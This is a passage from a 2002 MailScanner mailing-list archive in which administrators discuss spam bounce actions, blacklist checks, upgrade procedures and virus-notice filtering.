>Also, is there a way to get mailscanner to run the ordb.org and/or > >bl.spamcop.net test on all the servers that were in the delivery chain? The > >headers would need to be parsed to do this I guess. > > While we are on this subject... It would seem to me that I should be able to tell MailScanner to not invoke SpamAssassin if a message fails one or more RBL checks. And I'd like to bounce the message in that case, like above, with a bounce text identifying the RBL(s), something like what the dnsbl feature does in sendmail.My logic is that if it came from a black listed site that I haven't explicitly white listed, there's no point in examining it further. Just bounce the sucker. I'm not sure that it makes sense to check all of the MTA's that handled the message. It does make sense to me to provide a mechanism to skip my relay servers (almost all of my mail servers that are using MailScanner have one or more relay servers outside of a firewall), and I've modified MailScanner to skip those (specified via a config option). So now working towards a mod that will generate a sendmail dnsbl type bounce as soon as a site is identified as being black listed. For plain and simple spam, i.e., high SpamAssassin scores, I doubt that it worthwhile to expend the network resource on a bounce. The sender is unlikely to be collecting mail or doing anything with it. And if they are it is very possible that bouncing spam might just help the spammer in verifying good email addresses. Returning a bounce for a black list result does make sense to me. Some poor user at an ISP or organization that's been black listed ought to be notified as to why his/her email didn't go through. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From erich at OLYPEN.COM Tue Sep 10 23:58:02 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:33 2006 Subject: ANNOUNCE: 3.22-13 released In-Reply-To: <5.1.0.14.2.20020910115705.053d2b88@imap.ecs.soton.ac.uk> Message-ID: On Tue, 10 Sep 2002, Julian Field wrote: > At 11:26 10/09/2002, you wrote: > >Hi Julian, > >I'm new to the list and to MailScanner. Thanks for the program. > >I just recently installed MailScanner (about a week ago). Are there any > >upgrading instructions? I did'nt see any on your site. > > Save a copy of your mailscanner.conf somewhere safe. > rpm -Uvh mailscanner-3.22-13.i386.rpm How about if you can't or don't want to use rpm? Could you briefly summarize the upgrade process? I fall into both categories, I can't use rpm because it's broken on my RedHat 6.2 system and just dumps core all the time, and I don't want to use it because depending on rpm makes the overall system more complicated with more dependencies and more things to potentially go wrong, not a good thing if I'm going to eventually deploy mailscanner on a production system. Especially since rpm has demonstrated that it is prone to breaking, no way I want to depend on it. Eric From hciss at HCIWS.COM Wed Sep 11 00:25:13 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions References: <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> Message-ID: <002101c25921$533573c0$6401a8c0@matthew> > I'll take a look, that would be a useful feature. > I'll need to put the from into the to, and set the from to <>, then deliver > the message. > What should I put in the message? I would say something similiar to this: "Mail from " $&{client_addr}" refused by ordb.org open relay database" Or, better yet, links them right to query: "Spam blocked see: http://spamcop.net/bl.shtml?"$&{client_addr}')dnl Something similiar to please contact your ISP to resolve the issue. Your IP or mailserver's IP is listed in an anti-SPAM database. If you beleive you have received this in error please contact your ISP or recipient's ISP. It should still be possible to whitelist ones own IP's and the postmaster/abuse/admin accounts. Matt > At 17:32 10/09/2002, you wrote: > >Is there a way to reject/bounce instead of deliver/store/delete a message? > >It would be nice if it would make the return address or <> so it > >would not bounce back or go to the admin account either. That way the > >sender would know it had bounced. > > > >Also, is there a way to get mailscanner to run the ordb.org and/or > >bl.spamcop.net test on all the servers that were in the delivery chain? The > >headers would need to be parsed to do this I guess. > > > >Matt > > > > > ># Action to take when a message is detected as being spam: > ># deliver ==> Deliver it to the recipient > ># store ==> Move it to the quarantine > ># delete ==> Delete it completely > ># or else it can be a filename containing per-user and per-domain spam > ># actions. > >#Spam Action = /usr/local/MailScanner/etc/spam.actions.conf > >Spam Action = deliver From hamish.n.marson at BRITISHAIRWAYS.COM Wed Sep 11 05:31:45 2002 From: hamish.n.marson at BRITISHAIRWAYS.COM (Hamish Marson) Date: Thu Jan 12 21:15:33 2006 Subject: Hamish N Marson/HEATHROW/BRITISH AIRWAYS/GB is out of the office. Message-ID: I will be out of the office starting 01/09/2002 and will not return until 31/12/2003. From jim at ENTROPHY-FREE.NET Wed Sep 11 05:26:33 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:33 2006 Subject: Minor feature suggestion Message-ID: <1031718394.2041.17.camel@wilowisp.entrophy-free.net> It would be a "nice thing" if $Config::MailScannerVersion contained the full version id and possible patch level (and that any patches updated the version). Knowing that the version is 3.22 isn't overly that helpful when 3.22.8, 3.22.12 (possibly with patches) and 3.22.13 all exist. I've got bunches of servers with MailScanner installed and it got to be a pain figuring out which version was on a particular server so I started changing the version back around 3.22.8 and life has been much simpler since. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From jim at ENTROPHY-FREE.NET Wed Sep 11 05:31:59 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions In-Reply-To: <002101c25921$533573c0$6401a8c0@matthew> References: <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> Message-ID: <1031718719.1876.24.camel@wilowisp.entrophy-free.net> On Tue, 2002-09-10 at 18:25, Matt wrote: > > I'll take a look, that would be a useful feature. > > I'll need to put the from into the to, and set the from to <>, then > deliver > > the message. > > What should I put in the message? > > I would say something similiar to this: > > "Mail from " $&{client_addr}" refused by ordb.org open relay database" > > Or, better yet, links them right to query: > > "Spam blocked see: http://spamcop.net/bl.shtml?"$&{client_addr}')dnl > > Something similiar to please contact your ISP to resolve the issue. Your IP > or mailserver's IP is listed in an anti-SPAM database. If you beleive you > have received this in error please contact your ISP or recipient's ISP. > > It should still be possible to whitelist ones own IP's and the > postmaster/abuse/admin accounts. > Agreed, but I think it best to be judicious in generating a bounce for a black list hit. My preference is to only send the bounce back if it looks like a legitimate email message that just happens to originate from a black listed site. Spammers who take advantage of an open relay or those that fall for the "make money with your computer at home" could care less if the get a bounce (and most will never be delivered anyway). It's the innocent user that just happens to be at a black listed site that I'm concerned about. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From P.G.M.Peters at civ.utwente.nl Wed Sep 11 08:41:40 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:33 2006 Subject: ANNOUNCE: 3.22-13 released In-Reply-To: References: <5.1.0.14.2.20020910115705.053d2b88@imap.ecs.soton.ac.uk> Message-ID: On Tue, 10 Sep 2002 15:58:02 -0700, you wrote: >How about if you can't or don't want to use rpm? Could you briefly >summarize the upgrade process? I have written a procedure for our situation (hostnames, directories) for my replacement. There is one problem: It's in Dutch. If anybody is interested I can try to get some time to translate it into (my version of) English. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From P.G.M.Peters at civ.utwente.nl Wed Sep 11 08:45:32 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions In-Reply-To: <1031718719.1876.24.camel@wilowisp.entrophy-free.net> References: <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> Message-ID: On Tue, 10 Sep 2002 23:31:59 -0500, you wrote: >> It should still be possible to whitelist ones own IP's and the >> postmaster/abuse/admin accounts. >> >Agreed, but I think it best to be judicious in generating a bounce for a >black list hit. My preference is to only send the bounce back if it >looks like a legitimate email message that just happens to originate >from a black listed site. Spammers who take advantage of an open relay >or those that fall for the "make money with your computer at home" could >care less if the get a bounce (and most will never be delivered anyway). >It's the innocent user that just happens to be at a black listed site >that I'm concerned about. To make it even more difficult: Bounce the message referencing the blacklist if SA doesn't qualify it as spam. Don't bounce when SA says it's spam. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From smohan at VSNL.COM Wed Sep 11 08:57:40 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:33 2006 Subject: ANNOUNCE: 3.22-13 released In-Reply-To: Message-ID: Would you want to try Google for automated translation? Mohan -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Peter Peters Sent: 11 September 2002 13:12 To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: ANNOUNCE: 3.22-13 released On Tue, 10 Sep 2002 15:58:02 -0700, you wrote: >How about if you can't or don't want to use rpm? Could you briefly >summarize the upgrade process? I have written a procedure for our situation (hostnames, directories) for my replacement. There is one problem: It's in Dutch. If anybody is interested I can try to get some time to translate it into (my version of) English. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From P.G.M.Peters at civ.utwente.nl Wed Sep 11 09:26:10 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:33 2006 Subject: ANNOUNCE: 3.22-13 released In-Reply-To: References: Message-ID: <6fvtnusvvdet0ug1j09kdl76uf9o3f8vji@4ax.com> On Wed, 11 Sep 2002 13:27:40 +0530, you wrote: >Would you want to try Google for automated translation? I have checked Google and it doesn't seem to be able to translate from/to dutch yet. And it only seems to translate webpages it can reach and ours is password protected. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From LISTSERV at JISCMAIL.AC.UK Tue Sep 10 23:26:20 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:33 2006 Subject: MAILSCANNER: info@ACHIEVE-IT.COM left the list Message-ID: <200209102226.XAA29879@magpie.ecs.soton.ac.uk> Tue, 10 Sep 2002 23:26:20 Declan Connolly has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Tue, 10 Sep 2002 23:26:17 +0100 Received: from ns.achieve-it.com (ns.achieve-it.com [212.67.197.38]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8AMQFr27789 for ; Tue, 10 Sep 2002 23:26:15 +0100 Received: from default (pc805.as1.galway1.eircom.net [159.134.147.37]) by ns.achieve-it.com (8.10.2/8.10.2) with SMTP id g8AMan803751 for ; Tue, 10 Sep 2002 23:36:49 +0100 Message-ID: <02a501c25919$7121f320$2593869f@default> Reply-To: "Achieve Website Design" From: "Achieve Website Design" To: Subject: Date: Tue, 10 Sep 2002 23:28:46 +0100 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 X-MailScanner: Found to be clean From mailscanner at ecs.soton.ac.uk Wed Sep 11 10:41:21 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:33 2006 Subject: Minor feature suggestion In-Reply-To: <1031718394.2041.17.camel@wilowisp.entrophy-free.net> Message-ID: <5.1.0.14.2.20020911104108.0363bc98@imap.ecs.soton.ac.uk> At 05:26 11/09/2002, you wrote: >It would be a "nice thing" if $Config::MailScannerVersion contained the >full version id and possible patch level (and that any patches updated >the version). Knowing that the version is 3.22 isn't overly that helpful >when 3.22.8, 3.22.12 (possibly with patches) and 3.22.13 all exist. I've >got bunches of servers with MailScanner installed and it got to be a >pain figuring out which version was on a particular server so I started >changing the version back around 3.22.8 and life has been much simpler >since. Fixed in the next major release. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Wed Sep 11 10:38:54 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions In-Reply-To: <1031690279.2630.25.camel@wilowisp.dynetics.com> References: <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020911103724.02318460@imap.ecs.soton.ac.uk> At 21:37 10/09/2002, you wrote: >It would seem to me that I should be able to tell MailScanner to not >invoke SpamAssassin if a message fails one or more RBL checks. Added. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Wed Sep 11 10:02:51 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions In-Reply-To: References: <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> Message-ID: <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> At 08:45 11/09/2002, you wrote: >On Tue, 10 Sep 2002 23:31:59 -0500, you wrote: > > >> It should still be possible to whitelist ones own IP's and the > >> postmaster/abuse/admin accounts. > >> > >Agreed, but I think it best to be judicious in generating a bounce for a > >black list hit. My preference is to only send the bounce back if it > >looks like a legitimate email message that just happens to originate > >from a black listed site. Spammers who take advantage of an open relay > >or those that fall for the "make money with your computer at home" could > >care less if the get a bounce (and most will never be delivered anyway). > >It's the innocent user that just happens to be at a black listed site > >that I'm concerned about. > >To make it even more difficult: > >Bounce the message referencing the blacklist if SA doesn't qualify it as >spam. Don't bounce when SA says it's spam. I'm starting to regret this.... I need to keep it relatively simple or else no-one will ever work out how to use it, which is worse than doing nothing. I've got a fairly clear idea of what I want to do, which will hopefully keep most of you happy most of the time. If it detected as spam, add "bounce" to the list of things you can do, but allow you to put the contents of the X-MailScanner-SpamCheck header in the message (excluding all the SA rule hits). I hope that's good enough for most of you :-) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Wed Sep 11 09:53:21 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions In-Reply-To: <20020911083947.GH6398@hoiho.nz.lemon-computing.com> References: <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> Message-ID: <5.1.0.14.2.20020911095136.0232f5f0@imap.ecs.soton.ac.uk> At 09:39 11/09/2002, you wrote: >On Wed, Sep 11, 2002 at 09:45:32AM +0200, Peter Peters wrote: > > > To make it even more difficult: > > > > Bounce the message referencing the blacklist if SA doesn't qualify it as > > spam. Don't bounce when SA says it's spam. > >Being *extremely* careful not to include *any* text of the message, or you >will end up relaying spam from the spammer to the bunch of people whose >addresses he put in the envelope as senders... I've included the subject line in the bounce message, but I guess I should edit that out too. Good idea, otherwise the b******s will generate huge subject lines containing the message. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From P.G.M.Peters at civ.utwente.nl Wed Sep 11 10:57:13 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:33 2006 Subject: installation instruction Message-ID: Watch out. This is translated from dutch to english via http://chaines.free.fr/traduction/. You should keep the following in mind: We have a test-server named netlx803. The production servers are named netlx009 and netlx010. Both are identical. Normally everything is installed and configured on netlx009. In the relevant directory trees there are Makefiles copying the new files over to netlx010 so installation and configuration need only be done on one system. This way we also keep our aliases and virtusers in sync on both systems. Installation: The installation finds place from a tarbal. Because it is in perl written is there no distinction between source and binaries. Moreover the standard configuration assumes installation in/usr/local i.p.v./opt like at our usual. 1) The tarbal gedownload are placed and in ~mail/software/MailScanner on netlx803. 2) There he is unpacked. 3) Then go to the produced directory. 4) Go to mail scanner/bin. 5) Remove the softlinks in these directory (Sophos.install, check_mailscanner and tnef) 6) Open resistant the check_mailscanner.linux and modify the directory /usr/local/MailScanner in /opt/mailscanner in the rules 39 and 40. 7) Kopieer all files to /opt/mailscanner/bin. 8) Go to ../etc. 9) diff -u mailscanner.conf.linux /opt/mailscanner/etc/mailscanner.conf.linux 10) Check which new configuration options there are and add them to /opt/mailscanner/etc/mailscanner.conf.linux. In the most cases appear this simple to do than taking over the local configuration in the new file. Pay attention there, however, to that if there a file name must be taken over that the correct directory are used (/opt/mailscanner/etc). If there a new file is necessary, kopieer that then from the new distribution to /opt/mailscanner/etc. Change the contents of the file possibly to the UT situation. 11) Go to ../../f-prot. 12) Modify in autoupdate and f-protwrapper the reference to /usr/local/f-prot in /opt/f-prot. 13) Kopieer both files to/opt/f-prot. 14) Stopper the mail scanner process. 15) Give the command /opt/mailscanner/bin/check_mailscanner. this can to a number of errors give of SpamAssassin tests. Those is not important. If appears that he runs on netlx803 well, the same operations can be carried out on netlx009. Afterwards must in /opt/mail scanner "make" be run there the modifications on also netlx010 to be carried out to get. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From iah at DMU.AC.UK Wed Sep 11 11:02:10 2002 From: iah at DMU.AC.UK (Andy Humberston) Date: Thu Jan 12 21:15:33 2006 Subject: Feature request (ickle) Message-ID: One of our staff suggested a small feature/enhancement that may be useful..... We are currently receiving *large* amount of W32/Klez, with the help of Mailscanner and Sophos these are being detected. But our postmaster mailbox is getting inundated with virus reports for them, it would be nice if we could quietly delete certain virus messages for root. Andy -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020911/d3880b37/attachment.html From mailscanner at ecs.soton.ac.uk Wed Sep 11 11:08:06 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:33 2006 Subject: Feature request (ickle) In-Reply-To: Message-ID: <5.1.0.14.2.20020911110650.02449de8@imap.ecs.soton.ac.uk> At 11:02 11/09/2002, you wrote: >We are currently receiving *large* amount of W32/Klez, with >the help of Mailscanner and Sophos these are being detected. >But our postmaster mailbox is getting inundated with virus >reports for them, it would be nice if we could quietly delete >certain virus messages for root. I don't really want to get into selectively producing the notices. The best way to do this is by using filter or procmail to detect W32/Klez in the message body and just filter them off separately. Shoudn't be hard to do. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From LISTSERV at JISCMAIL.AC.UK Wed Sep 11 11:35:34 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:33 2006 Subject: MAILSCANNER: paul_houselander@BRISTOL-LEA.ORG.UK requested to join Message-ID: <200209111035.LAA29342@magpie.ecs.soton.ac.uk> Wed, 11 Sep 2002 11:35:34 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Paul Houselander . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER paul_houselander@BRISTOL-LEA.ORG.UK Paul Houselander The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+paul_houselander%40BRISTOL-LEA.ORG.UK+Paul+Houselander&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From S.R.Patterson at SOTON.AC.UK Wed Sep 11 13:41:59 2002 From: S.R.Patterson at SOTON.AC.UK (Patterson S.R.) Date: Thu Jan 12 21:15:33 2006 Subject: Logging style request Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, When you get a chance would you consider altering the logging code for matches on filename rules to have an identifiable tag. E.g. instead of logging: "Executable file in filename.exe" and "Possible MS-Dos shortcut attack in filename.pif" Log: "Filename Rules: Executable file in filename.exe" and "Filename rules: Possible MS-Dos shortcut attack in filename.pif" This would help enourmously in the processing of my sendmail logs. I realise I could do this simply by editing filename-rules.conf, but it seems it would be clearer if everyone had this benefit? Cheers, Steve - -- Steven Patterson MSci. Tel: +44 (0)2380 595810 Electronic Information Systems Support and Development Computing Services, University of Southampton, UK. Public PGP Key: http://www.soton.ac.uk/~srp/pubkey.asc -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBPX86Fq2fOiTs5+WvEQLKXwCfWKarWJm+wOzojokS7uoKqO+YQ10AoN5O kdpdCsYmYAwwP25WzDHcACsS =MCNp -----END PGP SIGNATURE----- From lbergman at abi.tconline.net Wed Sep 11 13:42:21 2002 From: lbergman at abi.tconline.net (Lewis Bergman) Date: Thu Jan 12 21:15:33 2006 Subject: RPM's bad, tar.gz good In-Reply-To: References: Message-ID: <200209110742.21784.lbergman@abi.tconline.net> > I fall into both categories, I can't use rpm because it's broken on > my RedHat 6.2 system and just dumps core all the time, and I don't > want to use it because depending on rpm makes the overall system more > complicated with more dependencies and more things to potentially go > wrong, not a good thing if I'm going to eventually deploy mailscanner > on a production system. Especially since rpm has demonstrated that it > is prone to breaking, no way I want to depend on it. If you want to customize maybe tar's are better but purely from a maintenance standpoint I would have to disagree. I'd have to say that if you have that much trouble with rpm then maybe it has been screwed up on that particular host. Package managers, whether they be rpm, deb, or any other used correctly typically makes maintenance easier. Many times a little behind the tar.gz of the packages and RH particularly seems to have problems with some web stuff but I haven't found any problems with any mail or DNS rpms. But of course, I run an rpm manager that handles both 3 and 4 major numbers. -- Lewis Bergman Texas Communications 4309 Maple St. Abilene, TX 79602-8044 915-695-6962 ext 115 From thomas_duvally at BROWN.EDU Wed Sep 11 14:20:07 2002 From: thomas_duvally at BROWN.EDU (Thomas DuVally) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions In-Reply-To: <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> References: <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> Message-ID: <1031750407.1667.18.camel@toms> Do many spammer really use their return address in the From or Reply-To? A very large number that I see tend to have our own domain in the From. Will this really do more that annoy the innocent, or fill up my postmaster account with more "User Unknown" bounces? The choice is good, I'm sure, but I don't see how I would ever want to use it. Please correct me if I'm missing something here. On Wed, 2002-09-11 at 05:02, Julian Field wrote: > At 08:45 11/09/2002, you wrote: > >On Tue, 10 Sep 2002 23:31:59 -0500, you wrote: > > > > >> It should still be possible to whitelist ones own IP's and the > > >> postmaster/abuse/admin accounts. > > >> > > >Agreed, but I think it best to be judicious in generating a bounce for a > > >black list hit. My preference is to only send the bounce back if it > > >looks like a legitimate email message that just happens to originate > > >from a black listed site. Spammers who take advantage of an open relay > > >or those that fall for the "make money with your computer at home" could > > >care less if the get a bounce (and most will never be delivered anyway). > > >It's the innocent user that just happens to be at a black listed site > > >that I'm concerned about. > > > >To make it even more difficult: > > > >Bounce the message referencing the blacklist if SA doesn't qualify it as > >spam. Don't bounce when SA says it's spam. > > I'm starting to regret this.... > I need to keep it relatively simple or else no-one will ever work out how > to use it, which is worse than doing nothing. I've got a fairly clear idea > of what I want to do, which will hopefully keep most of you happy most of > the time. If it detected as spam, add "bounce" to the list of things you > can do, but allow you to put the contents of the X-MailScanner-SpamCheck > header in the message (excluding all the SA rule hits). > > I hope that's good enough for most of you :-) > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Tom DuVally Lead Sys. Programmer CIS, Brown University p 401-863-9466 From mailscanner at ecs.soton.ac.uk Wed Sep 11 14:26:07 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions In-Reply-To: <1031750407.1667.18.camel@toms> References: <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020911142511.06eaa008@imap.ecs.soton.ac.uk> At 14:20 11/09/2002, you wrote: >Do many spammer really use their return address in the From or >Reply-To? A very large number that I see tend to have our own domain in >the From. I am not using any address from the headers, I only use the envelope. > Will this really do more that annoy the innocent, or fill up >my postmaster account with more "User Unknown" bounces? The "bounce" messages are sent in such a way that attempts to bounce the "bounce" message will fail. >The choice is good, I'm sure, but I don't see how I would ever want to >use it. Then don't :-) >Please correct me if I'm missing something here. > >On Wed, 2002-09-11 at 05:02, Julian Field wrote: > > At 08:45 11/09/2002, you wrote: > > >On Tue, 10 Sep 2002 23:31:59 -0500, you wrote: > > > > > > >> It should still be possible to whitelist ones own IP's and the > > > >> postmaster/abuse/admin accounts. > > > >> > > > >Agreed, but I think it best to be judicious in generating a bounce for a > > > >black list hit. My preference is to only send the bounce back if it > > > >looks like a legitimate email message that just happens to originate > > > >from a black listed site. Spammers who take advantage of an open relay > > > >or those that fall for the "make money with your computer at home" could > > > >care less if the get a bounce (and most will never be delivered anyway). > > > >It's the innocent user that just happens to be at a black listed site > > > >that I'm concerned about. > > > > > >To make it even more difficult: > > > > > >Bounce the message referencing the blacklist if SA doesn't qualify it as > > >spam. Don't bounce when SA says it's spam. > > > > I'm starting to regret this.... > > I need to keep it relatively simple or else no-one will ever work out how > > to use it, which is worse than doing nothing. I've got a fairly clear idea > > of what I want to do, which will hopefully keep most of you happy most of > > the time. If it detected as spam, add "bounce" to the list of things you > > can do, but allow you to put the contents of the X-MailScanner-SpamCheck > > header in the message (excluding all the SA rule hits). > > > > I hope that's good enough for most of you :-) > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ >-- >Tom DuVally >Lead Sys. Programmer >CIS, Brown University >p 401-863-9466 -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From LISTSERV at JISCMAIL.AC.UK Wed Sep 11 15:14:40 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:33 2006 Subject: MAILSCANNER: billa@STERLING.NET requested to join Message-ID: <200209111414.PAA25574@magpie.ecs.soton.ac.uk> Wed, 11 Sep 2002 15:14:40 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Bill Anderson . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER billa@STERLING.NET Bill Anderson The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+billa%40STERLING.NET+Bill+Anderson&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From lbergman at abi.tconline.net Wed Sep 11 15:15:18 2002 From: lbergman at abi.tconline.net (Lewis Bergman) Date: Thu Jan 12 21:15:33 2006 Subject: Feature, maybe misfeature Message-ID: <200209110915.18963.lbergman@abi.tconline.net> I am wondering if it would be helpful for anyone else to have spams sent to a different directory than viruses? I am searching for a way to put spam that we don't deliver into user's mail accounts. I think a seperate dir might make this easier only because I don't want to put mail containing viruses in their mail account. Also, I would love to be able to scan all outgoing mail but only selected incoming mail. The reason is that I would like to try and protect the rest of the interent from all my virused users but require the people on my system to pay to be protected. This may seem backwards but I have to recoup the cost of the virus engines from somewhere. Does anyone else think this would be good or am I off my rocker? -- Lewis Bergman Texas Communications 4309 Maple St. Abilene, TX 79602-8044 915-695-6962 ext 115 From mailscanner at ecs.soton.ac.uk Wed Sep 11 15:31:13 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: Feature, maybe misfeature In-Reply-To: <200209110915.18963.lbergman@abi.tconline.net> Message-ID: <5.1.0.14.2.20020911153032.06e62a00@imap.ecs.soton.ac.uk> At 15:15 11/09/2002, you wrote: >I am wondering if it would be helpful for anyone else to have spams sent to a >different directory than viruses? > >I am searching for a way to put spam that we don't deliver into user's mail >accounts. I think a seperate dir might make this easier only because I don't >want to put mail containing viruses in their mail account. That would normally involve hairy file locking over 